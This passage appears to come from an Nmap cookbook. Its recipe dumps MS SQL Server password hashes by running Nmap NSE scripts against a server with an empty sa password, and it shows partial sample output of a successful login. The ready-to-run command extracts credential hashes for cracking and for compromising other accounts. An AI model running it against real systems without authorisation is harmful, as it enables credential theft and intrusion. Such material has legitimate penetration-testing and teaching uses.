Dumping password hashes of MS SQL servers
After gaining access to an MS SQL server, we can dump all the password hashes of the server to compromise other accounts. Nmap can help us retrieve these hashes in a format usable by popular cracking tools such as John the Ripper.
This recipe shows how to dump password hashes of an MS SQL server with Nmap.
How to do it...
To dump all the password hashes of an MS SQL server with an empty system administrator password, run the following Nmap command:
$ nmap -p1433 --script ms-sql-empty-password,ms-sql-dump-hashes <target>
The password hashes will be included in the script output section:
PORT STATE SERVICE VERSION 1433/tcp open ms-sql-s Microsoft SQL Server 2011 Service Info: CPE: cpe:/o:microsoft:windows Host script results: | ms-sql-empty-password: | [192.168.1.102\MSSQLSERVER] |_ sa:<empty> => Login Success | ms...